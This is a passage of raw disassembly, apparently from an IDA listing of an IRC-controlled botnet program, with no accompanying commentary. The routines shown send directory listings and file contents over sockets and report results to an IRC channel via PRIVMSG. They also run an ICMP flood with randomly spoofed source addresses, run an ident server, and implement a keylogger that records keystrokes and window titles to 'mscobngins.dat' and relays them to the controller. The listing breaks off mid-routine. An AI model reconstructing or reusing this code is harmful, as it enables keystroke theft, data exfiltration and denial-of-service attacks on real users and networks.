lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_6 ; "%s%s"
push edi
push eax
call sub_418EF0
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
lea eax, [ebp+var_35C]
push eax
call sub_418E70
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_407ADF
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_407AE4
; ---------------------------------------------------------------------------
loc_407ADF: ; CODE XREF: sub_4075C7+50F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_407AE4: ; CODE XREF: sub_4075C7+516�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_418EF0
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_248]
push edi
push eax
call sub_418EF0
add esp, 1Ch
jmp short loc_407B65
; ---------------------------------------------------------------------------
loc_407B3F: ; CODE XREF: sub_4075C7+47B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi
loc_407B56: ; CODE XREF: sub_4075C7+407�j
lea eax, [ebp+var_248]
push eax
call sub_418EF0
add esp, 18h
loc_407B65: ; CODE XREF: sub_4075C7+31D�j
; sub_4075C7+449�j ...
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
cmp [ebp+arg_8], ebx
jz short loc_407B94
push 7D0h
call ds:dword_4942D8
loc_407B94: ; CODE XREF: sub_4075C7+226�j
; sub_4075C7+241�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call ds:dword_494338
test eax, eax
jnz loc_4077E7
loc_407BAC: ; CODE XREF: sub_4075C7+215�j
push [ebp+arg_0]
call ds:dword_494334
cmp [ebp+arg_8], ebx
jz short loc_407BEF
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_4055AD
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_4055AD
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_418D70
add esp, 14h
jmp short loc_407C23
; ---------------------------------------------------------------------------
loc_407BEF: ; CODE XREF: sub_4075C7+5F1�j
cmp [ebp+arg_C], ebx
jz short loc_407C09
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_418D70
pop ecx
pop ecx
jmp short loc_407C23
; ---------------------------------------------------------------------------
loc_407C09: ; CODE XREF: sub_4075C7+62B�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_418D70
add esp, 10h
loc_407C23: ; CODE XREF: sub_4075C7+626�j
; sub_4075C7+640�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_44B710 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4075C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C49 proc near ; CODE XREF: sub_407195+13B�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:dword_4942EC
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_407D01
push esi
push ebx
call ds:dword_49431C
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_407CFA
loc_407C8E: ; CODE XREF: sub_407C49+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_4189A0
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_407CAB
mov edi, [ebp+arg_4]
loc_407CAB: ; CODE XREF: sub_407C49+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:dword_494318
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call ds:dword_4942DC
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407CF5
call dword_44B654 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_407CFA
xor eax, eax
loc_407CF5: ; CODE XREF: sub_407C49+9B�j
sub [ebp+arg_4], eax
jnz short loc_407C8E
loc_407CFA: ; CODE XREF: sub_407C49+43�j
; sub_407C49+A8�j
push ebx
call ds:dword_4942E0
loc_407D01: ; CODE XREF: sub_407C49+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_407C49 endp
; =============== S U B R O U T I N E =======================================
sub_407D06 proc near ; CODE XREF: sub_407317+17C�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_418E70
test eax, eax
pop ecx
jbe short loc_407D2F
loc_407D19: ; CODE XREF: sub_407D06+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_407D23
mov byte ptr [esi+edi], 2Fh
loc_407D23: ; CODE XREF: sub_407D06+17�j
push edi
inc esi
call sub_418E70
cmp esi, eax
pop ecx
jb short loc_407D19
loc_407D2F: ; CODE XREF: sub_407D06+11�j
mov eax, edi
pop edi
pop esi
retn
sub_407D06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D34 proc near ; CODE XREF: sub_40C50A+2C0B�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call dword_44B638 ; WSAStartup
push 6
push 1
push 2
call dword_44B740 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call dword_44B6C0 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40AED0
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_44B668 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_407E11
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_407DAD
mov eax, offset dword_44B164
loc_407DAD: ; CODE XREF: sub_407D34+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_418EF0
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call dword_44B710 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_418A00
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call dword_44B6D8 ; recv
pop esi
loc_407E11: ; CODE XREF: sub_407D34+6B�j
push ebx
call dword_44B758 ; closesocket
call dword_44B620 ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_418D70
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_407E51
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_407E51: ; CODE XREF: sub_407D34+102�j
pop edi
pop ebx
leave
retn
sub_407D34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E55 proc near ; DATA XREF: sub_40C50A+3C04�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call dword_44B740 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_407EF0
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax
call sub_418D70
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_407ED3
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40842D
add esp, 14h
loc_407ED3: ; CODE XREF: sub_407E55+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_4035E1
push [ebp+var_38]
call sub_416507
pop ecx
pop ecx
push edi
call ds:dword_4942FC
loc_407EF0: ; CODE XREF: sub_407E55+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call dword_44B6A0 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_407F67
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_407F4A
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40842D
add esp, 14h
loc_407F4A: ; CODE XREF: sub_407E55+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_4035E1
push [ebp+var_38]
call sub_416507
pop ecx
pop ecx
push edi
call ds:dword_4942FC
loc_407F67: ; CODE XREF: sub_407E55+B3�j
lea eax, [ebp+var_1B8]
push eax
call dword_44B700 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_407FCE
lea eax, [ebp+var_3BC]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax
call sub_418D70
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_407FB1
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40842D
add esp, 14h
loc_407FB1: ; CODE XREF: sub_407E55+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_4035E1
push [ebp+var_38]
call sub_416507
pop ecx
pop ecx
push edi
call ds:dword_4942FC
loc_407FCE: ; CODE XREF: sub_407E55+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call dword_44B6C0 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_44B700 ; inet_addr
mov esi, ds:dword_494308
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi
mov [ebp+var_8], eax
loc_40800C: ; CODE XREF: sub_407E55+2E8�j
call esi
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_4081B7
push 41Ch
mov byte_44B168, 45h
call dword_44B6C0 ; htons
cmp [ebp+var_2C], edi
mov word_44B16A, ax
mov word_44B16C, bx
mov word_44B16E, di
mov byte_44B170, 80h
mov byte_44B171, bl
mov word_44B172, di
jz short loc_408092
call sub_419000
mov ebx, eax
shl ebx, 8
call sub_419000
add ebx, eax
shl ebx, 8
call sub_419000
add ebx, eax
shl ebx, 8
call sub_419000
add ebx, eax
push 1
mov dword_44B174, ebx
pop ebx
jmp short loc_4080AA
; ---------------------------------------------------------------------------
loc_408092: ; CODE XREF: sub_407E55+20B�j
push [ebp+var_1BC]
call sub_40AFEC
pop ecx
push eax
call dword_44B700 ; inet_addr
mov dword_44B174, eax
loc_4080AA: ; CODE XREF: sub_407E55+23B�j
mov eax, [ebp+var_18]
mov dword_44B178, eax
call sub_419000
cdq
mov ecx, 100h
idiv ecx
mov byte_44B17C, dl
call sub_419000
cdq
mov ecx, 100h
idiv ecx
mov byte_44B17D, dl
call sub_419000
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov word_44B17E, di
mov word_44B182, bx
inc edx
mov word_44B180, dx
call sub_419000
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_44B184
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_44B168
push [ebp+var_4]
call dword_44B724 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_408142
inc [ebp+arg_0]
jmp loc_40800C
; ---------------------------------------------------------------------------
loc_408142: ; CODE XREF: sub_407E55+2E3�j
push [ebp+var_4]
call dword_44B758 ; closesocket
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_418EF0
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_40819A
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40842D
add esp, 14h
loc_40819A: ; CODE XREF: sub_407E55+323�j
lea eax, [ebp+var_3BC]
push eax
call sub_4035E1
push [ebp+var_38]
call sub_416507
pop ecx
pop ecx
push edi
call ds:dword_4942FC
loc_4081B7: ; CODE XREF: sub_407E55+1C8�j
push [ebp+var_4]
call dword_44B758 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax
call sub_418D70
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_40821F
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40842D
add esp, 14h
loc_40821F: ; CODE XREF: sub_407E55+3A8�j
lea eax, [ebp+var_3BC]
push eax
call sub_4035E1
push [ebp+var_38]
call sub_416507
pop ecx
pop ecx
push edi
call ds:dword_4942FC
sub_407E55 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40823C proc near ; DATA XREF: sub_40BBCB+4B5�o
; sub_40C50A+1D84�o
var_238 = byte ptr -238h
var_38 = byte ptr -38h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
push 10h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_1C]
push esi
push eax
mov [ebp+var_8], esi
call sub_4189A0
add esp, 0Ch
mov [ebp+var_1C], 2
push 71h
call dword_44B6C0 ; htons
push esi
push 1
push 2
mov [ebp+var_1A], ax
mov [ebp+var_18], esi
call dword_44B740 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40839D
mov eax, [ebp+arg_0]
push edi
imul eax, 234h
mov dword_44D064[eax], ebx
lea eax, [ebp+var_1C]
push eax
push ebx
call dword_44B6EC ; bind
cmp eax, 0FFFFFFFFh
jz loc_40839D
push 5
push ebx
call dword_44B6E8 ; listen
cmp eax, 0FFFFFFFFh
jz loc_40839D
mov [ebp+var_C], edi
mov edi, 200h
loc_4082C7: ; CODE XREF: sub_40823C+EA�j
; sub_40823C+14A�j ...
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
call dword_44B754 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_408398
movzx eax, [ebp+var_2A]
push eax
push [ebp+var_28]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_238]
push offset aIdentdClientCo ; "[IDENTD]: Client connection from IP: %s"...
push eax
call sub_418D70
lea eax, [ebp+var_238]
push eax
call sub_4035E1
add esp, 14h
lea eax, [ebp+var_238]
push esi
push edi
push eax
push [ebp+var_4]
call dword_44B6D8 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4082C7
lea eax, [ebp+var_238]
push esi
push eax
call sub_4098D3
push 0Ch
lea eax, [ebp+var_38]
push esi
push eax
call sub_4189A0
push esi
push esi
lea eax, [ebp+var_38]
push 2
push eax
call sub_4138AA
push eax
push offset aUseridUnixS ; " : USERID : UNIX : %s\r\n"
lea eax, [ebp+var_238]
push edi
push eax
call sub_418EF0
add esp, 34h
lea eax, [ebp+var_238]
push esi
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_4]
call dword_44B710 ; send
cmp eax, 0FFFFFFFFh
jz loc_4082C7
mov [ebp+var_8], 1
jmp loc_4082C7
; ---------------------------------------------------------------------------
loc_408398: ; CODE XREF: sub_40823C+A0�j
cmp [ebp+var_8], esi
jnz short loc_4083C4
loc_40839D: ; CODE XREF: sub_40823C+47�j
; sub_40823C+6B�j ...
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_238]
push offset aIdentdErrorSer ; "[IDENTD]: Error: server failed, returne"...
push eax
call sub_418D70
lea eax, [ebp+var_238]
push eax
call sub_4035E1
add esp, 10h
loc_4083C4: ; CODE XREF: sub_40823C+15F�j
push ebx
call dword_44B758 ; closesocket
push [ebp+var_4]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
pop edi
pop esi
pop ebx
sub_40823C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083E7 proc near ; CODE XREF: sub_40C392+3D�p
; sub_40C50A+1C2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_4193F0
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_44B710 ; send
leave
retn
sub_4083E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40842D proc near ; CODE XREF: sub_4013F1+314�p
; .text:00401A0A�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_408448
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_408448: ; CODE XREF: sub_40842D+14�j
push edi
call sub_418E70
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_418E70
push [ebp+arg_8]
sub esi, eax
lea eax, [ebp+var_400]
push offset aS_7 ; "%s"
push esi
push eax
call sub_418EF0
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_418D70
add esp, 2Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_44B710 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_4084C6
push 7D0h
call ds:dword_4942D8
locret_4084C6: ; CODE XREF: sub_40842D+8C�j
leave
retn
sub_40842D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4084C8 proc near ; CODE XREF: sub_4085A9+B4�p
; sub_4085A9+253�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_494314
lea eax, [ebp+var_114]
push 104h
push eax
call ds:dword_494320
lea eax, [ebp+var_114]
push offset dword_43994C
push eax
call sub_419FB0
lea eax, [ebp+var_114]
push offset aMscobngins_dat ; "mscobngins.dat"
push eax
call sub_419FB0
lea eax, [ebp+var_114]
push offset dword_439950
push eax
call sub_419D70
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_40852F
push 1
pop eax
jmp short loc_4085A6
; ---------------------------------------------------------------------------
loc_40852F: ; CODE XREF: sub_4084C8+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_41AD60
push esi
call sub_419740
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_4085A4
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset aKeylogS ; "[KEYLOG]: %s"
push 200h
push eax
call sub_418EF0
push 0
lea eax, [ebp+var_314]
push [ebp+arg_8C]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_40842D
add esp, 24h
loc_4085A4: ; CODE XREF: sub_4084C8+A3�j
xor eax, eax
loc_4085A6: ; CODE XREF: sub_4084C8+65�j
pop esi
leave
retn
sub_4084C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085A9 proc near ; DATA XREF: sub_40C50A+1F23�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_4DC = byte ptr -4DCh
var_2DD = byte ptr -2DDh
var_2DC = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call dword_44B648 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_44B65C ; GetWindowTextA
mov ebx, 200h
loc_408604: ; CODE XREF: sub_4085A9+2C7�j
push 8
call ds:dword_4942D8
call dword_44B648 ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_40868C
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_44B65C ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_4DC]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_418D70
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4084C8
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_4189A0
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_4189A0
add esp, 0Ch
loc_40868C: ; CODE XREF: sub_4085A9+6C�j
mov [ebp+arg_0], offset aB ; "b"
loc_408693: ; CODE XREF: sub_4085A9+2BD�j
push 10h
call dword_44B5A0 ; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call dword_44B68C ; GetAsyncKeyState
test ah, 80h
jz short loc_40872B
push 14h
call dword_44B5A0 ; GetKeyState
test ax, ax
jz short loc_4086DC
cmp esi, 0FFFFFFFFh
jle short loc_4086DC
cmp edi, 40h
jle short loc_4086DC
cmp edi, 5Bh
jge short loc_4086DC
mov [ebp+edi*4+var_8DC], 1
jmp loc_40885B
; ---------------------------------------------------------------------------
loc_4086DC: ; CODE XREF: sub_4085A9+112�j
; sub_4085A9+117�j ...
push 14h
call dword_44B5A0 ; GetKeyState
test ax, ax
jz short loc_408707
test esi, esi
jge short loc_40871B
cmp edi, 40h
jle short loc_408707
cmp edi, 5Bh
jge short loc_408707
mov [ebp+edi*4+var_8DC], 2
jmp loc_40885B
; ---------------------------------------------------------------------------
loc_408707: ; CODE XREF: sub_4085A9+13E�j
; sub_4085A9+147�j ...
test esi, esi
jge short loc_40871B
mov [ebp+edi*4+var_8DC], 3
jmp loc_40885B
; ---------------------------------------------------------------------------
loc_40871B: ; CODE XREF: sub_4085A9+142�j
; sub_4085A9+160�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_40885B
; ---------------------------------------------------------------------------
loc_40872B: ; CODE XREF: sub_4085A9+105�j
mov esi, [ebp+edi*4+var_8DC]
lea eax, [ebp+edi*4+var_8DC]
test esi, esi
jz loc_40885B
and dword ptr [eax], 0
lea eax, [ebp+var_2DC]
cmp edi, 8
push eax
jnz short loc_408763
call sub_418E70
and [ebp+eax+var_2DD], 0
pop ecx
jmp loc_40885B
; ---------------------------------------------------------------------------
loc_408763: ; CODE XREF: sub_4085A9+1A5�j
call sub_418E70
cmp eax, 1B9h
pop ecx
jbe short loc_408795
call dword_44B648 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_44B65C ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_4087D6
; ---------------------------------------------------------------------------
loc_408795: ; CODE XREF: sub_4085A9+1C5�j
cmp edi, 0Dh
jnz loc_40882D
lea eax, [ebp+var_2DC]
push eax
call sub_418E70
test eax, eax
pop ecx
jz loc_40885B
call dword_44B648 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_44B65C ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_4087D6: ; CODE XREF: sub_4085A9+1EA�j
lea eax, [ebp+var_4DC]
push eax
call sub_418D70
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4084C8
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_4189A0
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_4189A0
add esp, 0Ch
jmp short loc_40885B
; ---------------------------------------------------------------------------
loc_40882D: ; CODE XREF: sub_4085A9+1EF�j
cmp esi, 1
jz short loc_408846
cmp esi, 3
jz short loc_408846
cmp esi, 2
jz short loc_408841
cmp esi, 4
jnz short loc_40885B
loc_408841: ; CODE XREF: sub_4085A9+291�j
push [ebp+arg_0]
jmp short loc_40884D
; ---------------------------------------------------------------------------
loc_408846: ; CODE XREF: sub_4085A9+287�j
; sub_4085A9+28C�j
mov eax, [ebp+arg_0]
add eax, 7
